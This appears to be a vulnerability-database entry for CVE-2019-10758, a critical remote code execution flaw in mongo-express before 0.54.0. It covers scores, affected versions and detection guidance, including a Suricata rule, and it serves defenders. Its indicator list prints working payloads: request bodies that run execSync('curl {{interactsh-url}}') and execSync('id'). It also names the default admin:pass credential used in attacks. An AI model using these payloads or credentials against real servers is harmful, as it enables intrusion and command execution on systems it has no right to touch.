cbcvebase.
CVE-2019-10758
published 2019-12-24


Priority: P1 (93)
CVSS 3.1: 9.9 CRITICAL (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability: due 2022-06-10
Exploited in the wild
EPSS: 84.84% (99.7th percentile)
mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that use the `toBSON` method: the submitted document is evaluated through the `vm` dependency, which is not a sandbox, so attacker-controlled code runs in the host process and can reach `child_process.exec`/`execSync`.

Affected (3 ranges)

Vendor                 Product        Version range     Fixed in
mongo-express_project  mongo-express  < 0.54.0          0.54.0
mongo-express_project  mongo-express  (not stated)      (not stated)
mongo-express_project  mongo-express  >= 0, < 0.54.0    0.54.0

Detection & IOCs (extracted from sources)

URL: /checkValid
Command: document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}")  (`{{interactsh-url}}` is a Nuclei out-of-band callback placeholder)
Command: document=this.constructor.constructor("return pr")().mainModule.require("child_process").execSync("id")
Port: 8081

Emerging Threats rule (Suricata 5 sticky-buffer syntax):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/checkValid"; http.request_body; content:"document=this.constructor"; content:"execSync"; distance:0; fast_pattern; reference:cve,2019-10758; reference:url,github.com/masahiro331/CVE-2019-10758; reference:url,blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; classtype:attempted-admin; sid:2033113; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_06_08, cve CVE_2019_10758, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_06_08;)
  • Exploitation is a POST to the /checkValid endpoint; detect POST requests to that URI path on mongo-express instances. The rule's `content:"/checkValid"` is a substring match on the URI, so it still fires when the application is mounted under a base path.
  • The payload body contains 'document=this.constructor' followed by 'execSync' (`distance:0`, i.e. the second string after the first); both must be present, in that order, for the rule to fire.
  • Shodan/FOFA fingerprinting: mongo-express instances are identifiable by the HTTP title 'Mongo Express' or 'mongo express', commonly exposed on port 8081.
  • The default Basic Auth header 'YWRtaW46cGFzcw==' (admin:pass) is used in exploit attempts. The CVSS vector carries PR:L, so the RCE needs a valid login, but unchanged default credentials make it effectively unauthenticated; alert on this value in Authorization headers to /checkValid.
  • The vulnerable toBSON code evaluates the submitted document with the vm module, which isolates JavaScript globals but not the host realm. On the host, look for child processes (sh, curl, wget, id) spawned by the node process that serves mongo-express, which is what `child_process.execSync` produces.
  • Vulnerable versions are mongo-express before 0.54.0 only; instances running 0.54.0 or higher are not affected.
  • The Emerging Threats rule (sid:2033113) is tagged confidence Medium and deployment Perimeter; tune accordingly for internal/containerized mongo-express deployments. It uses Suricata 5 sticky buffers (`http.method`, `http.uri`, `http.request_body`) and will not load unmodified on Snort.

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     9.9    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvd        v2.0     9.0    HIGH      AV:N/AC:L/Au:S/C:C/I:C/A:C  (CVSS v2 has no Critical band; 9.0 is High)
ghsa                9.9    CRITICAL
osv                 9.9    CRITICAL
vulncheck           9.9    CRITICAL
cisa                9.9    CRITICAL